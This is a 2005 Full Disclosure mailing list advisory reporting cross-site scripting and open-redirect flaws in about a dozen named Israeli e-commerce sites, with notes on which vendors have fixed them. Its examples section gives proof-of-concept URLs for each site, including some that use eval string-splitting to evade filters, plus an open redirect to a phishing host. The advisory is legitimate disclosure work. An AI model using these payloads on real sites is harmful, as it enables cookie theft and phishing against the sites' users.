Full Disclosure mailing list archives
Leading Israeli e-commerce sites XSS vulnerabilities advisory
From: Aviv Raff <avivra () 012 net il>
Date: Mon, 10 Jan 2005 00:44:32 +0200
Leading Israeli e-commerce sites XSS vulnerabilities advisory URL: <http://www.raffon.net/advisories/commxss.html> http://www.raffon.net/advisories/commxss.html Date: January 10, 2005 Author: Aviv Raff Introduction Many leading Israeli e-commerce sites are phishing enabled, and contain pages which allow injecting code that can execute arbitrary scripts. Technical Details Many leading Israeli e-commerce sites generate dynamic HTML web pages using user-submitted data, and data from other sources. Most of these sites do not filter the data before presenting it to the user, and therefore are vulnerable to Cross-Site Scripting. They allow injecting code that can execute arbitrary scripts, steal the user's cookie, or display fake pages. P1000 web site allows redirecting to external pages using a simple query string input, which can be easily exploited by phishers. Examples NetAction: http://www.netaction.co.il/search.php?qsn=<img%20src=Images/space.gif%20onlo ad=alert(document.cookie)%20> http://www.netaction.co.il/personal.php?formPersonalID="><img%20src=Images/s pace.gif%20onload=alert(document.cookie)%20> http://www.netaction.co.il/contact.php?formFirstName="><img%20src=Images/spa ce.gif%20onload=alert(document.cookie)%20> P1000: http://www.p1000.co.il/default.asp?urladd=http://www.phisher.com Wallashops: http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="><script>aler t(document.cookie)</script> http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="%20onmouseove r=eval("al"%2B"ert(doc"%2B"ument.coo"%2B"kie)")%20" Zap: http://www.zap.co.il/gsearch.asp?keyword=<script>alert(document.cookie)</scr ipt> GetIt: http://www.getit.co.il/ie2/ProdList_Search.asp?sw1=<script>alert(document.co okie)</script> Sakal Online: http://www.sakal.co.il/jsp/pg/SearchResultNew.jsp?searchType=byName&keyWord= <script>alert(document.cookie)</script> NfcShop: http://shop.nfc.co.il/signin.asp?msg=<script>alert(document.cookie)</script> Daka90: http://daka90.ynet.co.il/Login/CdaPersonalAreaLogin/1,2141,,00.html?txtemail ='><script>alert(document.cookie)</script> Olsale: http://www.olsale.co.il/olsale/Login.aspx?urlsource=><script>alert(document. cookie)</script>&type=1&rtype=1 Issta: http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&pr ice_id=3944&from_date='><script>alert(document.cookie)</script>10/04/2004&to _date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&pr ice_id=3944&from_date='%20onmouseover=alert(document.cookie)%20x='10/04/2004 &to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml Parsi: http://www.parsi.co.il/SignIn.asp?referrer="><script>alert(document.cookie)< /script> http://www.parsi.co.il/SignIn.asp?referrer="><img%20src=/new_images/cat_p_do t.jpg%20onload=eval("alert(doc"%2B"ume"%2B"nt."%2B"co"%2B"okie)",10)%20> Arkia: http://www.arkia.co.il/click/cl_4005.main?p_domestic_yn="><iframe%20src="htt p://www.arkia.co.il/"%20onload="if%20(document.cookie!='')alert(document.coo kie)"></iframe> Printmall: https://www.printmall.co.il/Artists/Join.asp?Artsts_FName="><script>alert(do cument.cookie)</script> One (This is actually a leading sport website, but it has a paid premium section and also contains links to other e-commerce sites): http://www.one.co.il/one/search.asp?data=<script>alert(document.cookie)</scr ipt> http://www.one.co.il/search/MoreArticals.asp?data=<script>alert(document.coo kie)</script> Solutions All of the sites were contacted via email, or a suggestion form on 27/12/2004. Netaction, P1000, GetIt, Daka90, Arkia and Printmall sites have already fixed the vulnerabilities. Wallashops, Issta and Parsi sites are partly fixed. Other sites are still vulnerable, and one should be careful following a link to those sites, or give confidential information. Disclaimer: The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind. -- Copyright C 2004-2005 Aviv Raff. --
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Leading Israeli e-commerce sites XSS vulnerabilities advisory Aviv Raff (Jan 09)